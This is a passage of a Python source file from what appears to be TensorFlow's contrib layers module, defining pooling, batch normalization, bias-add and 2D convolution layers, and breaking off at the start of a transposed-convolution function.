text stringlengths 4 1.02M | meta dict |
|---|---|
"""Higher level ops for building layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import six
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.layers.python.layers import initializers
from tensorflow.contrib.layers.python.layers import utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.training import moving_averages
# TODO(b/28426988): Replace legacy_* fns migrated from slim.
# TODO(b/28426988): Remove legacy_* when all uses have migrated to new API.
# Public API of this module. The `legacy_*` entries are kept only for
# backward compatibility with code migrated from slim (see TODOs above
# this list) and should not be used in new code.
__all__ = ['avg_pool2d',
           'batch_norm',
           'bias_add',
           'conv2d',
           'conv2d_in_plane',
           'conv2d_transpose',
           'convolution2d',
           'convolution2d_in_plane',
           'convolution2d_transpose',
           'dropout',
           'flatten',
           'fully_connected',
           'layer_norm',
           'linear',
           'max_pool2d',
           'one_hot_encoding',
           'relu',
           'relu6',
           'repeat',
           'separable_conv2d',
           'separable_convolution2d',
           'softmax',
           'stack',
           'unit_norm',
           'legacy_fully_connected',
           'legacy_linear',
           'legacy_relu']

# Accepted values for the `data_format` argument of the layers below:
# 'NCHW' = [batch, channels, height, width],
# 'NHWC' = [batch, height, width, channels] (the default everywhere).
DATA_FORMAT_NCHW = 'NCHW'
DATA_FORMAT_NHWC = 'NHWC'
@add_arg_scope
def avg_pool2d(inputs,
               kernel_size,
               stride=2,
               padding='VALID',
               data_format=DATA_FORMAT_NHWC,
               outputs_collections=None,
               scope=None):
  """Adds a 2D average pooling op.

  Pooling is applied per image over the spatial dimensions only; the batch
  and channel dimensions are left untouched.

  Args:
    inputs: A 4-D tensor of shape `[batch_size, height, width, channels]` if
      `data_format` is `NHWC`, and `[batch_size, channels, height, width]` if
      `data_format` is `NCHW`.
    kernel_size: A list of length 2: [kernel_height, kernel_width] of the
      pooling kernel over which the op is computed. Can be an int if both
      values are the same.
    stride: A list of length 2: [stride_height, stride_width].
      Can be an int if both strides are the same. Note that presently
      both strides must have the same value.
    padding: The padding method, either 'VALID' or 'SAME'.
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    outputs_collections: The collections to which the outputs are added.
    scope: Optional scope for name_scope.

  Returns:
    A `Tensor` representing the results of the pooling operation.

  Raises:
    ValueError: if `data_format` is neither `NHWC` nor `NCHW`.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with ops.name_scope(scope, 'AvgPool2D', [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)
    k_h, k_w = utils.two_element_tuple(kernel_size)
    s_h, s_w = utils.two_element_tuple(stride)
    # Place the spatial window/stride values on the H/W axes of the chosen
    # layout; batch and channel axes always use 1.
    if data_format == DATA_FORMAT_NHWC:
      ksize, strides = [1, k_h, k_w, 1], [1, s_h, s_w, 1]
    else:
      ksize, strides = [1, 1, k_h, k_w], [1, 1, s_h, s_w]
    pooled = nn.avg_pool(inputs,
                         ksize=ksize,
                         strides=strides,
                         padding=padding,
                         data_format=data_format)
    return utils.collect_named_outputs(outputs_collections, sc, pooled)
def _fused_batch_norm(
    inputs,
    decay=0.999,
    center=True,
    scale=False,
    epsilon=0.001,
    activation_fn=None,
    param_initializers=None,
    updates_collections=ops.GraphKeys.UPDATE_OPS,
    is_training=True,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    data_format=DATA_FORMAT_NHWC,
    scope=None):
  """Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.

  "Batch Normalization: Accelerating Deep Network Training by Reducing
  Internal Covariate Shift", Sergey Ioffe, Christian Szegedy.

  Fused implementation backing `batch_norm(fused=True)`; uses
  `nn.fused_batch_norm` for the normalization itself.

  Can be used as a normalizer function for conv2d and fully_connected.

  Note: When is_training is True the moving_mean and moving_variance need to be
  updated, by default the update_ops are placed in `tf.GraphKeys.UPDATE_OPS` so
  they need to be added as a dependency to the `train_op`, example:

    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    if update_ops:
      updates = tf.group(*update_ops)
      total_loss = control_flow_ops.with_dependencies([updates], total_loss)

  One can set updates_collections=None to force the updates in place, but that
  can have speed penalty, specially in distributed settings.

  Args:
    inputs: a tensor with 2 or more dimensions, where the first dimension has
      `batch_size`. The normalization is over all but the last dimension if
      `data_format` is `NHWC` and the second dimension if `data_format` is
      `NCHW`.
    decay: decay for the moving average.
    center: If True, subtract `beta`. If False, `beta` is ignored.
    scale: If True, multiply by `gamma`. If False, `gamma` is
      not used. When the next layer is linear (also e.g. `nn.relu`), this can be
      disabled since the scaling can be done by the next layer.
    epsilon: small float added to variance to avoid dividing by zero.
    activation_fn: activation function, default set to None to skip it and
      maintain a linear activation.
    param_initializers: optional initializers for beta, gamma, moving mean and
      moving variance.
    updates_collections: collections to collect the update ops for computation.
      The updates_ops need to be executed with the train_op.
      If None, a control dependency would be added to make sure the updates are
      computed in place.
    is_training: whether or not the layer is in training mode. In training mode
      it would accumulate the statistics of the moments into `moving_mean` and
      `moving_variance` using an exponential moving average with the given
      `decay`. When it is not in training mode then it would use the values of
      the `moving_mean` and the `moving_variance`.
    reuse: whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: optional collections for the variables.
    outputs_collections: collections to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    scope: Optional scope for `variable_scope`.

  Returns:
    A `Tensor` representing the output of the operation.

  Raises:
    ValueError: if `data_format` is neither `NHWC` nor `NCHW`.
    ValueError: if the rank of `inputs` is undefined.
    ValueError: if rank or last dimension of `inputs` is undefined.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with variable_scope.variable_scope(
      scope, 'BatchNorm', [inputs], reuse=reuse) as sc:
    inputs = ops.convert_to_tensor(inputs)
    inputs_shape = inputs.get_shape()
    inputs_rank = inputs_shape.ndims
    if inputs_rank is None:
      raise ValueError('Inputs %s has undefined rank.' % inputs.name)
    dtype = inputs.dtype.base_dtype
    # The per-channel parameter shape: channels are the last axis for NHWC
    # and the second axis for NCHW.
    if data_format == DATA_FORMAT_NHWC:
      params_shape = inputs_shape[-1:]
    else:
      params_shape = inputs_shape[1:2]
    if not params_shape.is_fully_defined():
      raise ValueError('Inputs %s has undefined last dimension %s.' %
                       (inputs.name, params_shape))
    # Allocate parameters for the beta and gamma of the normalization.
    # Note: the fused op requires both beta and gamma tensors, so they are
    # always created here; `center`/`scale` only control trainability.
    trainable_beta = trainable and center
    beta_collections = utils.get_variable_collections(variables_collections,
                                                      'beta')
    if not param_initializers:
      param_initializers = {}
    beta_initializer = param_initializers.get('beta',
                                              init_ops.zeros_initializer)
    beta = variables.model_variable(
        'beta',
        shape=params_shape,
        dtype=dtype,
        initializer=beta_initializer,
        collections=beta_collections,
        trainable=trainable_beta)
    trainable_gamma = trainable and scale
    gamma_collections = utils.get_variable_collections(variables_collections,
                                                       'gamma')
    gamma_initializer = param_initializers.get('gamma',
                                               init_ops.ones_initializer)
    gamma = variables.model_variable(
        'gamma',
        shape=params_shape,
        dtype=dtype,
        initializer=gamma_initializer,
        collections=gamma_collections,
        trainable=trainable_gamma)
    # Create moving_mean and moving_variance variables and add them to the
    # appropriate collections. They are never trainable; they are updated
    # via exponential moving averages below.
    moving_mean_collections = utils.get_variable_collections(
        variables_collections, 'moving_mean')
    moving_mean_initializer = param_initializers.get('moving_mean',
                                                     init_ops.zeros_initializer)
    moving_mean = variables.model_variable(
        'moving_mean',
        shape=params_shape,
        dtype=dtype,
        initializer=moving_mean_initializer,
        trainable=False,
        collections=moving_mean_collections)
    moving_variance_collections = utils.get_variable_collections(
        variables_collections, 'moving_variance')
    moving_variance_initializer = param_initializers.get(
        'moving_variance', init_ops.ones_initializer)
    moving_variance = variables.model_variable(
        'moving_variance',
        shape=params_shape,
        dtype=dtype,
        initializer=moving_variance_initializer,
        trainable=False,
        collections=moving_variance_collections)
    # If `is_training` doesn't have a constant value, because it is a `Tensor`,
    # a `Variable` or `Placeholder` then is_training_value will be None and
    # `needs_moments` will be true.
    is_training_value = utils.constant_value(is_training)
    need_moments = is_training_value is None or is_training_value
    if need_moments:
      # Calculate the moments based on the individual batch.
      def _fused_batch_norm_training():
        return nn.fused_batch_norm(
            inputs, gamma, beta, epsilon=epsilon, data_format=data_format)
      def _fused_batch_norm_inference():
        return nn.fused_batch_norm(
            inputs,
            gamma,
            beta,
            mean=moving_mean,
            variance=moving_variance,
            epsilon=epsilon,
            is_training=False,
            data_format=data_format)
      # smart_cond resolves to a plain Python branch when `is_training` is a
      # constant, and builds a tf.cond otherwise.
      outputs, mean, variance = utils.smart_cond(is_training,
                                                 _fused_batch_norm_training,
                                                 _fused_batch_norm_inference)
      moving_vars_fn = lambda: (moving_mean, moving_variance)
      if updates_collections is None:
        # No collection given: force the moving-average updates to run as a
        # control dependency of the outputs.
        def _force_updates():
          """Internal function forces updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay)
          with ops.control_dependencies(
              [update_moving_mean, update_moving_variance]):
            return array_ops.identity(mean), array_ops.identity(variance)
        mean, variance = utils.smart_cond(is_training, _force_updates,
                                          moving_vars_fn)
        with ops.control_dependencies([mean, variance]):
          outputs = array_ops.identity(outputs)
      else:
        # Collection given: register the update ops there; the caller is
        # responsible for running them with the train_op.
        def _delay_updates():
          """Internal function that delay updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay)
          return update_moving_mean, update_moving_variance
        update_mean, update_variance = utils.smart_cond(is_training,
                                                        _delay_updates,
                                                        moving_vars_fn)
        ops.add_to_collections(updates_collections, update_mean)
        ops.add_to_collections(updates_collections, update_variance)
        # Use computed moments during training and moving_vars otherwise.
        vars_fn = lambda: (mean, variance)
        mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
    else:
      # `is_training` is statically False: run pure inference against the
      # moving statistics; no update ops are created.
      mean, variance = moving_mean, moving_variance
      outputs, _, _ = nn.fused_batch_norm(
          inputs,
          gamma,
          beta,
          mean=moving_mean,
          variance=moving_variance,
          epsilon=epsilon,
          is_training=False,
          data_format=data_format)
    outputs.set_shape(inputs_shape)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def batch_norm(
    inputs,
    decay=0.999,
    center=True,
    scale=False,
    epsilon=0.001,
    activation_fn=None,
    param_initializers=None,
    updates_collections=ops.GraphKeys.UPDATE_OPS,
    is_training=True,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    batch_weights=None,
    fused=False,
    data_format=DATA_FORMAT_NHWC,
    scope=None):
  """Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.

  "Batch Normalization: Accelerating Deep Network Training by Reducing
  Internal Covariate Shift", Sergey Ioffe, Christian Szegedy.

  Can be used as a normalizer function for conv2d and fully_connected.

  Note: When is_training is True the moving_mean and moving_variance need to be
  updated, by default the update_ops are placed in `tf.GraphKeys.UPDATE_OPS` so
  they need to be added as a dependency to the `train_op`, example:

    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    if update_ops:
      updates = tf.group(*update_ops)
      total_loss = control_flow_ops.with_dependencies([updates], total_loss)

  One can set updates_collections=None to force the updates in place, but that
  can have speed penalty, specially in distributed settings.

  Args:
    inputs: a tensor with 2 or more dimensions, where the first dimension has
      `batch_size`. The normalization is over all but the last dimension if
      `data_format` is `NHWC` and the second dimension if `data_format` is
      `NCHW`.
    decay: decay for the moving average.
    center: If True, subtract `beta`. If False, `beta` is ignored.
    scale: If True, multiply by `gamma`. If False, `gamma` is
      not used. When the next layer is linear (also e.g. `nn.relu`), this can be
      disabled since the scaling can be done by the next layer.
    epsilon: small float added to variance to avoid dividing by zero.
    activation_fn: activation function, default set to None to skip it and
      maintain a linear activation.
    param_initializers: optional initializers for beta, gamma, moving mean and
      moving variance.
    updates_collections: collections to collect the update ops for computation.
      The updates_ops need to be executed with the train_op.
      If None, a control dependency would be added to make sure the updates are
      computed in place.
    is_training: whether or not the layer is in training mode. In training mode
      it would accumulate the statistics of the moments into `moving_mean` and
      `moving_variance` using an exponential moving average with the given
      `decay`. When it is not in training mode then it would use the values of
      the `moving_mean` and the `moving_variance`.
    reuse: whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: optional collections for the variables.
    outputs_collections: collections to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    batch_weights: An optional tensor of shape `[batch_size]`,
      containing a frequency weight for each batch item. If present,
      then the batch normalization uses weighted mean and
      variance. (This can be used to correct for bias in training
      example selection.)
    fused: Use nn.fused_batch_norm if True, nn.batch_normalization otherwise.
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    scope: Optional scope for `variable_scope`.

  Returns:
    A `Tensor` representing the output of the operation.

  Raises:
    ValueError: if `batch_weights` is not None and `fused` is True.
    ValueError: if `data_format` is neither `NHWC` nor `NCHW`.
    ValueError: if `data_format` is `NCHW` while `fused` is False.
    ValueError: if the rank of `inputs` is undefined.
    ValueError: if rank or last dimension of `inputs` is undefined.
  """
  # The fused path delegates everything to _fused_batch_norm; it does not
  # support per-example batch weights.
  if fused:
    if batch_weights is not None:
      raise ValueError('Weighted mean and variance is not currently '
                       'supported for fused batch norm.')
    return _fused_batch_norm(
        inputs,
        decay=decay,
        center=center,
        scale=scale,
        epsilon=epsilon,
        activation_fn=activation_fn,
        param_initializers=param_initializers,
        updates_collections=updates_collections,
        is_training=is_training,
        reuse=reuse,
        variables_collections=variables_collections,
        outputs_collections=outputs_collections,
        trainable=trainable,
        data_format=data_format,
        scope=scope)
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  # The non-fused path below only handles NHWC.
  if data_format == DATA_FORMAT_NCHW:
    raise ValueError('data_format must be NHWC if fused is False.')
  with variable_scope.variable_scope(scope, 'BatchNorm', [inputs],
                                     reuse=reuse) as sc:
    inputs = ops.convert_to_tensor(inputs)
    inputs_shape = inputs.get_shape()
    inputs_rank = inputs_shape.ndims
    if inputs_rank is None:
      raise ValueError('Inputs %s has undefined rank.' % inputs.name)
    dtype = inputs.dtype.base_dtype
    if batch_weights is not None:
      batch_weights = ops.convert_to_tensor(batch_weights)
      inputs_shape[0:1].assert_is_compatible_with(batch_weights.get_shape())
      # Reshape batch weight values so they broadcast across inputs.
      nshape = [-1] + [1 for _ in range(inputs_rank - 1)]
      batch_weights = array_ops.reshape(batch_weights, nshape)
    # Normalize over all axes except the last (channels) one.
    axis = list(range(inputs_rank - 1))
    params_shape = inputs_shape[-1:]
    if not params_shape.is_fully_defined():
      raise ValueError('Inputs %s has undefined last dimension %s.' % (
          inputs.name, params_shape))
    # Allocate parameters for the beta and gamma of the normalization.
    # Unlike the fused path, beta/gamma are only created when requested;
    # nn.batch_normalization accepts None for either.
    beta, gamma = None, None
    if not param_initializers:
      param_initializers = {}
    if center:
      beta_collections = utils.get_variable_collections(variables_collections,
                                                        'beta')
      beta_initializer = param_initializers.get('beta',
                                                init_ops.zeros_initializer)
      beta = variables.model_variable('beta',
                                      shape=params_shape,
                                      dtype=dtype,
                                      initializer=beta_initializer,
                                      collections=beta_collections,
                                      trainable=trainable)
    if scale:
      gamma_collections = utils.get_variable_collections(variables_collections,
                                                         'gamma')
      gamma_initializer = param_initializers.get('gamma',
                                                 init_ops.ones_initializer)
      gamma = variables.model_variable('gamma',
                                       shape=params_shape,
                                       dtype=dtype,
                                       initializer=gamma_initializer,
                                       collections=gamma_collections,
                                       trainable=trainable)
    # Create moving_mean and moving_variance variables and add them to the
    # appropriate collections. They are never trainable; they are updated
    # via exponential moving averages below.
    moving_mean_collections = utils.get_variable_collections(
        variables_collections, 'moving_mean')
    moving_mean_initializer = param_initializers.get('moving_mean',
                                                     init_ops.zeros_initializer)
    moving_mean = variables.model_variable(
        'moving_mean',
        shape=params_shape,
        dtype=dtype,
        initializer=moving_mean_initializer,
        trainable=False,
        collections=moving_mean_collections)
    moving_variance_collections = utils.get_variable_collections(
        variables_collections, 'moving_variance')
    moving_variance_initializer = param_initializers.get(
        'moving_variance', init_ops.ones_initializer)
    moving_variance = variables.model_variable(
        'moving_variance',
        shape=params_shape,
        dtype=dtype,
        initializer=moving_variance_initializer,
        trainable=False,
        collections=moving_variance_collections)
    # If `is_training` doesn't have a constant value, because it is a `Tensor`,
    # a `Variable` or `Placeholder` then is_training_value will be None and
    # `needs_moments` will be true.
    is_training_value = utils.constant_value(is_training)
    need_moments = is_training_value is None or is_training_value
    if need_moments:
      # Calculate the moments based on the individual batch.
      if batch_weights is None:
        # Use a copy of moving_mean as a shift to compute more reliable moments.
        shift = math_ops.add(moving_mean, 0)
        mean, variance = nn.moments(inputs, axis, shift=shift)
      else:
        mean, variance = nn.weighted_moments(inputs, axis, batch_weights)
      moving_vars_fn = lambda: (moving_mean, moving_variance)
      if updates_collections is None:
        # No collection given: force the moving-average updates to run as a
        # control dependency of the returned mean/variance.
        def _force_updates():
          """Internal function forces updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay)
          with ops.control_dependencies([update_moving_mean,
                                         update_moving_variance]):
            return array_ops.identity(mean), array_ops.identity(variance)
        mean, variance = utils.smart_cond(is_training,
                                          _force_updates,
                                          moving_vars_fn)
      else:
        # Collection given: register the update ops there; the caller is
        # responsible for running them with the train_op.
        def _delay_updates():
          """Internal function that delay updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay)
          return update_moving_mean, update_moving_variance
        update_mean, update_variance = utils.smart_cond(is_training,
                                                        _delay_updates,
                                                        moving_vars_fn)
        ops.add_to_collections(updates_collections, update_mean)
        ops.add_to_collections(updates_collections, update_variance)
        # Use computed moments during training and moving_vars otherwise.
        vars_fn = lambda: (mean, variance)
        mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
    else:
      # `is_training` is statically False: normalize with the stored moving
      # statistics; no update ops are created.
      mean, variance = moving_mean, moving_variance
    # Compute batch_normalization.
    outputs = nn.batch_normalization(inputs, mean, variance, beta, gamma,
                                     epsilon)
    outputs.set_shape(inputs_shape)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def bias_add(inputs,
             activation_fn=None,
             initializer=init_ops.zeros_initializer,
             regularizer=None,
             reuse=None,
             variables_collections=None,
             outputs_collections=None,
             trainable=True,
             scope=None):
  """Adds a bias to the inputs.

  Can be used as a normalizer function for conv2d and fully_connected.

  Args:
    inputs: a tensor of with at least rank 2 and value for the last dimension,
      e.g. `[batch_size, depth]`, `[None, None, None, depth]`.
    activation_fn: activation function, default set to None to skip it and
      maintain a linear activation.
    initializer: An initializer for the bias, defaults to 0.
    regularizer: A regularizer like the result of
      `l1_regularizer` or `l2_regularizer`.
    reuse: whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: optional collections for the variables.
    outputs_collections: collections to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    scope: Optional scope for variable_scope.

  Returns:
    a tensor representing the result of adding biases to the inputs.
  """
  with variable_scope.variable_scope(scope, 'BiasAdd', [inputs],
                                     reuse=reuse) as sc:
    inputs = ops.convert_to_tensor(inputs)
    dtype = inputs.dtype.base_dtype
    # One bias per feature in the last dimension (requires rank >= 2).
    num_features = utils.last_dimension(inputs.get_shape(), min_rank=2)
    bias_collections = utils.get_variable_collections(
        variables_collections, 'biases')
    biases = variables.model_variable(
        'biases',
        shape=[num_features],
        dtype=dtype,
        initializer=initializer,
        regularizer=regularizer,
        collections=bias_collections,
        trainable=trainable)
    outputs = nn.bias_add(inputs, biases)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def convolution2d(inputs,
                  num_outputs,
                  kernel_size,
                  stride=1,
                  padding='SAME',
                  data_format=DATA_FORMAT_NHWC,
                  rate=1,
                  activation_fn=nn.relu,
                  normalizer_fn=None,
                  normalizer_params=None,
                  weights_initializer=initializers.xavier_initializer(),
                  weights_regularizer=None,
                  biases_initializer=init_ops.zeros_initializer,
                  biases_regularizer=None,
                  reuse=None,
                  variables_collections=None,
                  outputs_collections=None,
                  trainable=True,
                  scope=None):
  """Adds a 2D convolution followed by an optional batch_norm layer.

  `convolution2d` creates a variable called `weights`, representing the
  convolutional kernel, that is convolved with the `inputs` to produce a
  `Tensor` of activations. If a `normalizer_fn` is provided (such as
  `batch_norm`), it is then applied. Otherwise, if `normalizer_fn` is
  None and a `biases_initializer` is provided then a `biases` variable would be
  created and added the activations. Finally, if `activation_fn` is not `None`,
  it is applied to the activations as well.

  Performs a'trous convolution with input stride equal to rate if rate is
  greater than one.

  Args:
    inputs: a 4-D tensor of shape `[batch_size, height, width, channels]` if
      `data_format` is `NHWC`, and `[batch_size, channels, height, width]` if
      `data_format` is `NCHW`.
    num_outputs: integer, the number of output filters.
    kernel_size: a list of length 2 `[kernel_height, kernel_width]` of
      of the filters. Can be an int if both values are the same.
    stride: a list of length 2 `[stride_height, stride_width]`.
      Can be an int if both strides are the same. Note that presently
      both strides must have the same value.
    padding: one of `VALID` or `SAME`.
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    rate: integer. If less than or equal to 1, a standard convolution is used.
      If greater than 1, than the a'trous convolution is applied and `stride`
      must be set to 1, `data_format` must be set to `NHWC`.
    activation_fn: activation function, set to None to skip it and maintain
      a linear activation.
    normalizer_fn: normalization function to use instead of `biases`. If
      `normalizer_fn` is provided then `biases_initializer` and
      `biases_regularizer` are ignored and `biases` are not created nor added.
      default set to None for no normalizer function
    normalizer_params: normalization function parameters.
    weights_initializer: An initializer for the weights.
    weights_regularizer: Optional regularizer for the weights.
    biases_initializer: An initializer for the biases. If None skip biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: optional list of collections for all the variables or
      a dictionary containing a different list of collection per variable.
    outputs_collections: collection to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    scope: Optional scope for `variable_scope`.

  Returns:
    a tensor representing the output of the operation.

  Raises:
    ValueError: if `data_format` is neither `NHWC` nor `NCHW`.
    ValueError: if `rate` is larger than one and `data_format` is `NCHW`.
    ValueError: if both `rate` and `stride` are larger than one.
  """
  with variable_scope.variable_scope(scope, 'Conv', [inputs],
                                     reuse=reuse) as sc:
    if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
      raise ValueError('data_format has to be either NCHW or NHWC.')
    # atrous_conv2d below only supports NHWC.
    if rate > 1 and data_format == DATA_FORMAT_NCHW:
      raise ValueError('If rate > 1, data_format must be NHWC')
    inputs = ops.convert_to_tensor(inputs)
    dtype = inputs.dtype.base_dtype
    kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
    stride_h, stride_w = utils.two_element_tuple(stride)
    # Dilation and striding are mutually exclusive in this layer.
    if rate > 1 and (stride_h > 1 or stride_w > 1):
      raise ValueError('Only one of rate or stride can be larger than one')
    # Input channel count: last axis for NHWC, second axis for NCHW.
    if data_format == DATA_FORMAT_NHWC:
      num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
    else:
      num_filters_in = inputs.get_shape().dims[1]
    weights_shape = [kernel_h, kernel_w,
                     num_filters_in, num_outputs]
    weights_collections = utils.get_variable_collections(
        variables_collections, 'weights')
    weights = variables.model_variable('weights',
                                       shape=weights_shape,
                                       dtype=dtype,
                                       initializer=weights_initializer,
                                       regularizer=weights_regularizer,
                                       collections=weights_collections,
                                       trainable=trainable)
    if rate > 1:
      # Dilated (a'trous) convolution; stride is implicitly 1 here.
      outputs = nn.atrous_conv2d(inputs, weights, rate, padding=padding)
    else:
      if data_format == DATA_FORMAT_NHWC:
        strides = [1, stride_h, stride_w, 1]
      else:
        strides = [1, 1, stride_h, stride_w]
      outputs = nn.conv2d(
          inputs, weights, strides, padding=padding, data_format=data_format)
    # A normalizer (e.g. batch_norm) replaces the bias term entirely.
    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)
    else:
      if biases_initializer is not None:
        biases_collections = utils.get_variable_collections(
            variables_collections, 'biases')
        biases = variables.model_variable('biases',
                                          shape=[num_outputs,],
                                          dtype=dtype,
                                          initializer=biases_initializer,
                                          regularizer=biases_regularizer,
                                          collections=biases_collections,
                                          trainable=trainable)
        outputs = nn.bias_add(outputs, biases, data_format=data_format)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def convolution2d_in_plane(
    inputs,
    kernel_size,
    stride=1,
    padding='SAME',
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer,
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Performs the same in-plane convolution to each channel independently.

  This is useful for performing various simple channel-independent convolution
  operations such as image gradients:

    image = tf.constant(..., shape=(16, 240, 320, 3))
    vert_gradients = layers.conv2d_in_plane(image,
                                            kernel=[1, -1],
                                            kernel_size=[2, 1])
    horz_gradients = layers.conv2d_in_plane(image,
                                            kernel=[1, -1],
                                            kernel_size=[1, 2])

  Args:
    inputs: a 4-D tensor with dimensions [batch_size, height, width, channels].
    kernel_size: a list of length 2 holding the [kernel_height, kernel_width] of
      of the pooling. Can be an int if both values are the same.
    stride: a list of length 2 `[stride_height, stride_width]`.
      Can be an int if both strides are the same. Note that presently
      both strides must have the same value.
    padding: the padding type to use, either 'SAME' or 'VALID'.
    activation_fn: activation function, set to None to skip it and maintain
      a linear activation.
    normalizer_fn: normalization function to use instead of `biases`. If
      `normalizer_fn` is provided then `biases_initializer` and
      `biases_regularizer` are ignored and `biases` are not created nor added.
      default set to None for no normalizer function
    normalizer_params: normalization function parameters.
    weights_initializer: An initializer for the weights.
    weights_regularizer: Optional regularizer for the weights.
    biases_initializer: An initializer for the biases. If None skip biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: optional list of collections for all the variables or
      a dictionary containing a different list of collection per variable.
    outputs_collections: collection to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    scope: Optional scope for `variable_scope`.

  Returns:
    A `Tensor` representing the output of the operation.
  """
  with variable_scope.variable_scope(
      scope, 'ConvInPlane', [inputs], reuse=reuse) as sc:
    # Convert first so non-Tensor inputs (e.g. numpy arrays) work, matching
    # the behavior of the other layers in this module.
    inputs = ops.convert_to_tensor(inputs)
    dtype = inputs.dtype.base_dtype
    kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
    stride_h, stride_w = utils.two_element_tuple(stride)
    num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
    # A single [kernel_h, kernel_w] filter is learned and shared by every
    # input channel (in-plane, channel-independent convolution).
    weights_shape = [kernel_h, kernel_w, 1, 1]
    weights_collections = utils.get_variable_collections(
        variables_collections, 'weights')
    weights = variables.model_variable('weights',
                                       shape=weights_shape,
                                       dtype=dtype,
                                       initializer=weights_initializer,
                                       regularizer=weights_regularizer,
                                       collections=weights_collections,
                                       trainable=trainable)
    # Replicate the single filter across channels and apply it depthwise so
    # each channel is convolved independently with the same kernel.
    depthwise_weights = array_ops.tile(weights, [1, 1, num_filters_in, 1])
    outputs = nn.depthwise_conv2d(inputs, depthwise_weights,
                                  [1, stride_h, stride_w, 1], padding)
    # A normalizer (e.g. batch_norm) replaces the bias term entirely.
    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)
    else:
      if biases_initializer is not None:
        biases_collections = utils.get_variable_collections(
            variables_collections, 'biases')
        biases = variables.model_variable('biases',
                                          shape=[num_filters_in,],
                                          dtype=dtype,
                                          initializer=biases_initializer,
                                          regularizer=biases_regularizer,
                                          collections=biases_collections,
                                          trainable=trainable)
        outputs = nn.bias_add(outputs, biases)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def convolution2d_transpose(
    inputs,
